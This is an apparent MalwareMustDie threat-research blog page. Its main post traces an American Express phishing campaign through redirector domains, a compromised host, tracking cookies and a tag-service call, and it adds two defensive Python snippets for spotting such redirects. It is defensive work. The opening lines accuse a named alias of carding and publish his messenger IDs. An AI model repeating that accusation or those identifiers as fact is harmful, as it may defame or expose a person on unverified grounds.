This Rome0 guy is a well-known carder and scammer, with the contacts below (Kudos MMD DE team!)
ICQ 22222193 
Jabber 22222193(at)jabber.cz


The above information is enough to lead law enforcement to take action and get the real IDs of the actors behind the screen. They are reachable, and we pass it all on to justice.
Herewith we are backing off from the investigation and intelligence of this case, for the law to follow up properly.

MalwareMustDie, NPO., does not own any source code / samples / reversing data for this threat. We are posting this exclusively to support the other entities mentioned above in this investigation, so please ask the front-line posters mentioned for further details.

Credit: Kudos MalwareMustDie Intel Dept, IntelCrawler (link), Xylibox (link) & Josh Grunzweig (link).

Q & A:

#MalwareMustDie!, we repeat "MUST!!" die. We're on it.
This post is dedicated to MMD Georgia Crusaders.

Wednesday, February 5, 2014

MMD-0015-2014 - One upon the time with American Express Phishing Session..

As you may know, the MMD blog focuses on malware/botnet related threats. But today I want to make an exception: my SMTP honeypot is full of American Express phishing scam emails, so I dare myself to write up my "experience" with this phishing matter. It is not a thorough analysis, so please bear with some lack of information in the post.

On the other hand, I captured everything. For the convenience of law enforcement and threat researchers in their investigation, I attached the PCAP & all captured data grabbed from the session; please feel free to use it and analyze it deeper. The point of this public post is to raise awareness of this phishing attempt, since some people I know got hit by this scam. Here we go:

It all started with a phishing email:

In phishing, the URL is important; see the redirector URL trick in the email above.
And URLquery has records of OTHER URLs too, see the check requests below:
↑We can say that kaindustries.comcastbiz.net is utilized by a phishing effort.

If you click any link in the email, you will get forwarded:

And ending up into the fake American Express site below:

So this perfectbackstretch. com/americanexpress/ is the landing URL.

The route of the above redirections was generated as below:

PoC of the forwarding routes in my Wireshark capture, in a Fiddler-like setting :-)

For old-schoolers like me, just fire the marked conditions :-)

The scripts that trigger the redirection to the destination are at the URL written in the spam:

These call the destination coded in the JavaScript of each JS file, as in the one sample below:

Additionally, I downloaded all the HTML code and ran it locally to find a perfect match.. the whole code is meant to run on any remote side without much dependency on its host/server..

Some suspicious points..

There are plenty of suspicious points and some JavaScript to check, all well made to conduct this phishing; again, please see the PCAP for more details on those. This phishing scheme also uses GoDaddy's SSL service for encryption; I am not so sure whether the real American Express site uses it too. BUT I want to point you to the correlation of the remote site accesses that were spotted and recorded while following the phishing link. I found two suspicious connections, and each of them is really "interesting".

To be noted: I am not pointing a finger at anyone. These might also be traps implemented by the phisher to disrupt the investigation, or maybe AMEX itself has these links/codes by default; I don't know 100% about that. So I will let the AmEx phishing experts judge further. Just read the explanation of the two points below and judge for yourself; any opinions are welcome in the comments.

1. Cookie link (or callback?) ref to redirector kaindustries.comcastbiz.net on landing page..

Well, we saw the page I snipped above, but behind the process there was an interesting call, below:

Yes, OK, it looks like a favicon check that received a 404, nothing special.. but after the session on the phishing site went further, the recorded PCAP below shows a similar but quite interesting request:

It carries a cookie, doesn't it?.. and it is URL-encoded, so..

I am fond of cookie codes like this (recently, thx to the CookieBomb crooks), so I made it "beautiful" and..
There!.. A cookie to keep the connection after login..

It explains the redirector sites and the access "ticket" to the phishing landing page..hmm..interesting.
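The decoding step described above, as an added example that is not part of the original post or its capture: it URL-decodes every cookie in a raw request and reports the ones whose decoded value names a host other than the one being requested. The request, cookie names and `.example` hosts are constructed; the real values are in the PCAP.

```python
import re
from urllib.parse import unquote

# Constructed sample request (not the captured one; reserved .example hosts).
SAMPLE_REQUEST = (
    "GET /americanexpress/favicon.ico HTTP/1.1\r\n"
    "Host: landing.example\r\n"
    "Cookie: sid=abc123; src=http%3A%2F%2Fredirector.example%2Fmsg%2Findex.html%3Fid%3D42; "
    "lang=en%2DUS\r\n"
    "\r\n"
)

# Heuristic: a host name at the start of the value or right after "scheme://".
HOST_IN_VALUE = re.compile(r"(?:^|://)([a-z0-9.-]+\.[a-z]{2,})(?=[:/?#]|$)")

def parse_headers(raw):
    """Return a dict of lower-cased header names to values from a raw HTTP request."""
    headers = {}
    for line in raw.split("\r\n")[1:]:
        if not line:
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def decode_fully(value, max_rounds=5):
    """URL-decode repeatedly, since tracking values may be encoded more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def foreign_hosts_in_cookies(raw):
    """List (cookie name, decoded value, host) for cookies that point at another host."""
    headers = parse_headers(raw)
    request_host = headers.get("host", "").lower().split(":")[0]
    findings = []
    for pair in headers.get("cookie", "").split(";"):
        name, sep, value = pair.strip().partition("=")
        if not sep:
            continue
        decoded = decode_fully(value)
        match = HOST_IN_VALUE.search(decoded.lower())
        if match and match.group(1) != request_host:
            findings.append((name, decoded, match.group(1)))
    return findings
```

Run over the Cookie headers exported from a capture, this turns the manual "beautify" step into a list of redirector hosts that can be reported.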

So what's kaindustries.comcastbiz.net?

kaindustries.comcastbiz.net. 13597 IN   A

NetRange: -
NetName:        AFFINITY-INT
NetHandle:      NET-216-87-160-0-1
Parent:         NET-216-0-0-0-0
NetType:        Direct Allocation
RegDate:        1999-07-21
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-216-87-160-0-1

OrgName:        Affinity Internet, Inc
OrgId:          AFFI
Address:        Corporate headquarters
Address:        3250 W. Commercial Blvd.
City:           Ft. Lauderdale
StateProv:      FL
PostalCode:     33309
Country:        US
Updated:        2011-07-07
Ref:            http://whois.arin.net/rest/org/AFFI

OrgAbuseHandle: ABUSE649-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-954-334-8080
The web site:

It doesn't look strange so far.. but why is the phishing page URL linked to this site?
Answer: A compromised site.
So what's with the "cookie" request that notes the source of infection? Well, this might be the phishing crook's way to know which malvertisement site/spam ticket led to the hit on this site, isn't it? The bad guys are quite persistent in tracking which spam/redirector URL a request is coming from.

Ah, yes. We reported this incident to the site's contact address:

2. An "abuse" request (to fake AmEx ticket?) to nexus.ensighten.com

There is also an interesting GET command to nexus.ensighten.com:

If we beautify the GET URL, the format looks as below:

What caused that GET request is the Bootstrap script below:

A better view of the weird part is:

So let's see if there is any response from nexus.ensighten.com to this request:

Is it a coincidence that it links to nexus.ensighten.com, grabs the phishing site's URL and sends it?
Does the real American Express site also link to it? I leave the answer to the American Express Online folks..
If YES, then this is merely an abuse of an API used by AmEx (assuming that nexus.ensighten.com is a legit API of AMEX) to fake the appearance of the phishing page and make it look "more legit" to fool the victims.

But if the answer is NO.. this could be a potential phishing tracking scheme to know the traffic of the hits; we can imagine a scheme of money sharing starting at this point between the criminals involved, or maybe a panel on that site too?

For some checks, I requested the above JS GET URL with RuleID = 124663 and received the code below:

And a second request with RuleID = 302786 received the response below:

Either these responses come from a legit AmEx Online API that the phishing crooks abused, or.. they are good fakes..
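If a copied script does report the page it runs on to a tag service the real site also uses, that reported URL is a detection signal for the brand owner. An added example, not from the original post or its capture: it scans constructed tag-request log lines and lists the hosts that fired the tag outside the brand's own domains. The log format, the `ruleId` and `page` parameter names and the `.example` hosts are assumptions.

```python
from urllib.parse import urlsplit, parse_qsl

# Assumption: the brand's own web domains (placeholder names, not from the post).
BRAND_DOMAINS = {"brand.example"}

# Constructed tag-request log lines: "<client ip> <referer> <request url>".
SAMPLE_LOG = """\
198.51.100.7 https://www.brand.example/login https://tags.example/rule?ruleId=1&page=https%3A%2F%2Fwww.brand.example%2Flogin
203.0.113.9 http://clone.example/brand/ https://tags.example/rule?ruleId=1&page=http%3A%2F%2Fclone.example%2Fbrand%2F
203.0.113.5 - https://tags.example/rule?ruleId=2&page=https%3A%2F%2Fwww.brand.example.clone.example%2F
192.0.2.4 - https://tags.example/rule?ruleId=2
"""

def host_of(url):
    """Lower-cased host of a URL, or None when it is not an absolute http(s) URL."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return parts.hostname.rstrip(".")

def is_brand_host(host):
    """True only for a brand domain or a real subdomain of one (label-boundary match)."""
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)

def pages_reported(line):
    """Every page URL a log line carries: the Referer plus URL-valued query parameters."""
    _ip, referer, request = line.split(" ", 2)
    candidates = [referer] + [v for _k, v in parse_qsl(urlsplit(request).query)]
    return [c for c in candidates if host_of(c)]

def off_brand_hits(log):
    """Sorted (client ip, foreign host) pairs for tags fired outside the brand's sites."""
    hits = set()
    for line in filter(None, log.splitlines()):
        ip = line.split(" ", 1)[0]
        for page in pages_reported(line):
            host = host_of(page)
            if not is_brand_host(host):
                hits.add((ip, host))
    return sorted(hits)
```

The third sample line is the case a plain substring check misses: a lookalike host that merely contains the brand's domain name.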

Anyway, nexus.ensighten.com is in AWS:

Is it normal?

And this is the page of nexus.ensighten.com:

Is it normal?

It is out of my expertise. I will pass & leave it to the American Express security team, phishing researcher folks and law enforcement agencies in United States to dig further..


At this point I think I will leave the further investigation to the AMEX phishing experts.
I share my recorded data to be used for further investigation, as per the snipped picture below (click the picture to download)

Please leave a comment with your contact information (email) for the password; I will not publish comments that ask for the password.

The URLquery for this phishing is--->>[HERE]
It was taken at the same time as I checked, but URLQuery does not seem able to reach the same result as mine; from my PC with a JP IP I can access it.

Kudos to our friend who noticed the same threat too :-)

Stay safe friends! #MalwareMustDie